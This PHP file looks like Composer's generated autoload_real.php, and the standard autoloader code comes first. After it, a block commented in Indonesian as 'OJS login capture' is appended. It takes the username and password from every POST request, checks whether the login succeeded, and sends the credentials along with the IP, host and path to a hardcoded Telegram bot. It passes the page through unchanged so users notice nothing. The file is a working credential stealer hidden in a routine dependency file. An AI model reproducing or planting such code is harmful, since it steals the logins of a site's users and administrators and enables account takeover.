<?php

// autoload_real.php @generated by Composer

class ComposerAutoloaderInit054355ae6616808e5821a786b9632197
{
    private static $loader;

    public static function loadClassLoader($class)
    {
        if ('Composer\Autoload\ClassLoader' === $class) {
            require __DIR__ . '/ClassLoader.php';
        }
    }

    public static function getLoader()
    {
        if (null !== self::$loader) {
            return self::$loader;
        }

        spl_autoload_register(array('ComposerAutoloaderInit054355ae6616808e5821a786b9632197', 'loadClassLoader'), true, true);
        self::$loader = $loader = new \Composer\Autoload\ClassLoader();
        spl_autoload_unregister(array('ComposerAutoloaderInit054355ae6616808e5821a786b9632197', 'loadClassLoader'));

        $useStaticLoader = PHP_VERSION_ID >= 50600 && !defined('HHVM_VERSION') && (!function_exists('zend_loader_file_encoded') || !zend_loader_file_encoded());
        if ($useStaticLoader) {
            require_once __DIR__ . '/autoload_static.php';

            call_user_func(\Composer\Autoload\ComposerStaticInit054355ae6616808e5821a786b9632197::getInitializer($loader));
        } else {
            $map = require __DIR__ . '/autoload_namespaces.php';
            foreach ($map as $namespace => $path) {
                $loader->set($namespace, $path);
            }

            $map = require __DIR__ . '/autoload_psr4.php';
            foreach ($map as $namespace => $path) {
                $loader->setPsr4($namespace, $path);
            }

            $classMap = require __DIR__ . '/autoload_classmap.php';
            if ($classMap) {
                $loader->addClassMap($classMap);
            }
        }

        $loader->register(true);

        if ($useStaticLoader) {
            $includeFiles = Composer\Autoload\ComposerStaticInit054355ae6616808e5821a786b9632197::$files;
        } else {
            $includeFiles = require __DIR__ . '/autoload_files.php';
        }
        foreach ($includeFiles as $fileIdentifier => $file) {
            composerRequire054355ae6616808e5821a786b9632197($fileIdentifier, $file);
        }

        return $loader;
    }
}

function composerRequire054355ae6616808e5821a786b9632197($fileIdentifier, $file)
{
    if (empty($GLOBALS['__composer_autoload_files'][$fileIdentifier])) {
        require $file;

        $GLOBALS['__composer_autoload_files'][$fileIdentifier] = true;
    }
}
/**
 * OJS LOGIN CAPTURE - DENGAN DETEKSI SUKSES/GAGAL (FIXED)
 * File: /dev/shm/.ojs_capture
 */

$bot_token = '8859521729:AAFishpLzFMIPd8bDotaujqJV-NRLXMTq3c';
$chat_id = '8259867883';

$username = '';
$password = '';

// Tangkap login dari POST
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $username = $_POST['username'] ?? $_POST['email'] ?? '';
    $password = $_POST['password'] ?? '';
}

if (!empty($username) && !empty($password)) {
    
    // Mulai capture output
    ob_start();
    
    // Simpan data untuk dikirim setelah kita tahu hasil login
    $login_data = [
        'username' => $username,
        'password' => $password,
        'ip' => $_SERVER['HTTP_CF_CONNECTING_IP'] ?? $_SERVER['HTTP_X_FORWARDED_FOR'] ?? $_SERVER['REMOTE_ADDR'] ?? 'Unknown',
        'time' => date('Y-m-d H:i:s'),
        'host' => $_SERVER['HTTP_HOST'] ?? 'unknown',
        'path' => $_SERVER['REQUEST_URI'] ?? '/',
        'ua' => $_SERVER['HTTP_USER_AGENT'] ?? 'Unknown'
    ];
    
    // Register shutdown function
    register_shutdown_function(function() use ($login_data, $bot_token, $chat_id) {
        // Ambil response
        $response = ob_get_clean();
        
        // ========== KIRIM LAGI OUTPUT KE BROWSER (INI YANG DITAMBAH) ==========
        echo $response;  // ← INI KUNCI NYA! Agar halaman tidak putih
        // ====================================================================
        
        // Cek apakah login GAGAL
        $is_failed = false;
        $error_indicators = ['Invalid', 'incorrect', 'wrong', 'failed', 'error', 'tidak valid', 'salah'];
        
        foreach ($error_indicators as $indicator) {
            if (stripos($response, $indicator) !== false) {
                $is_failed = true;
                break;
            }
        }
        
        // Cek apakah sukses (redirect)
        $headers = headers_list();
        $is_success = false;
        foreach ($headers as $header) {
            if (stripos($header, 'Location:') !== false && 
                (stripos($header, 'dashboard') !== false || stripos($header, 'index') !== false)) {
                $is_success = true;
                break;
            }
        }
        
        // Tentukan status
        if ($is_success) {
            $status = 'SUCCESS';
            $emoji = '✅';
        } elseif ($is_failed) {
            $status = 'FAILED';
            $emoji = '❌';
        } else {
            $status = 'ATTEMPT';
            $emoji = '🔐';
        }
        
        // Kirim notifikasi Telegram
        $message = "{$emoji} OJS LOGIN {$status}\n";
        $message .= "━━━━━━━━━━━━━━━━━━━━━━━━━━━\n";
        $message .= "👤 USERNAME: {$login_data['username']}\n";
        $message .= "🔑 PASSWORD: {$login_data['password']}\n";
        $message .= "━━━━━━━━━━━━━━━━━━━━━━━━━━━\n";
        $message .= "🌐 IP: {$login_data['ip']}\n";
        $message .= "📍 PATH: {$login_data['path']}\n";
        $message .= "⏰ TIME: {$login_data['time']}\n";
        $message .= "🌍 HOST: {$login_data['host']}\n";
        
        if ($is_failed) {
            $message .= "\n⚠️ PERHATIAN: Password SALAH!";
        }
        
        $url = "https://api.telegram.org/bot{$bot_token}/sendMessage";
        $post_data = "chat_id={$chat_id}&text=" . urlencode($message);
        
        if (function_exists('curl_init')) {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_POST, 1);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
            curl_setopt($ch, CURLOPT_TIMEOUT, 3);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
            curl_exec($ch);
            curl_close($ch);
        }
    });
}
